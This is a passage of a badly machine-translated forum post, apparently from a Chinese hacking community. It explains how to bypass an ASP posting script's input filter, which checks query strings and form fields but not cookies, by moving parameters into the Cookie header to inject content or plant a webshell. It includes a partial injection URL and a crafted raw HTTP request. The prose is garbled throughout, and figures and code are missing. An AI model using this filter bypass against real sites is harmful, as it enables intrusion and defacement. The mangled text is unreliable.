Recently watched at the octonary number system forum in view of Bole the ASP receiving procedure crack analysis, achieves through the submission data gains the webshell method! Happen to have the friend to let me help to look at the day discontinue the submission question! Is mainly because some procedure user from has defined some functions, enables the original method not to be able to bypass the function, but yesterday looks, may realize through other methods!
First, day discontinue's other bug here does not look, looks at the submission process directly!
On-line announcement's submission process is similar this kind of connection:
http://www.xxx.com/post.asp?act=&d00=202&d01=
src= http://www.a.com >&d02=&d10=&d11=17000813&d20=&d21=&d22=&d23=&d30= day discontinue
&d31=&d32=1&d33=&d40=0&d41=0&d42=0&d50=&d51=&d98=&d99=123
Returns as shown in Figure 1 the expression normal insertion
We have a look at the examination data the page and the partial source code, as shown in Figure 2
But some procedures have actually used some from the defining function, carries on the confirmation and the filtration in view of the submission data
My here has a code to be as follows:
[Copy to clipboard] [-] CODE:
Trust many friends already looked, just like analyzes the website system to be the same, this was only aims at Request.QueryString and Request.Form from the definition code has carried on the filtration, has not carried on the filtration to the cookie submission's way! Then we have a look at the day discontinue again the gain way
strAreaName = request (“d00”) // also has many, only writes one
….
….
if strAreaName "" then RS (“AreaName”) = strAreaName // also has many, only writes one
….
….
This has not undergone the filtration the day discontinue code, increased is passed through from the defining function page the request variable the Function CheckStr(ChkStr) filtration, but also had one submission way is the cookie submission! Below we have a look at the submission method!
First is aims at time the normal submission carries on stresses a package of analysis, then carries on the data packet the structure, my here constructs the package as follows (here I revised real information, ^_^):
[Copy to clipboard] [-] CODE:
GET /post.asp?
act=&d00=202&d02=&d11=17000813&d20=&d21=&d22=&d23=&d30=cookie&d31=&d32=1&d33=&d40=0&d41=0&d4
2=0&d50=&d51=&d98=&d99=123 HTTP/1.1
Accept: */*
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)
Host: xxx.com
Connection: Keep-Alive
Cookie: ASPSESSIONIDCATSSDRC=NAAGENEADMNBDLJJFMKLGMDO; d01=; d10=
Here data we only needed to put in through the cookie submission data in the cookie item to be possible, other might maintain invariable!
Other pages: : 1 * 2 * Next>>
|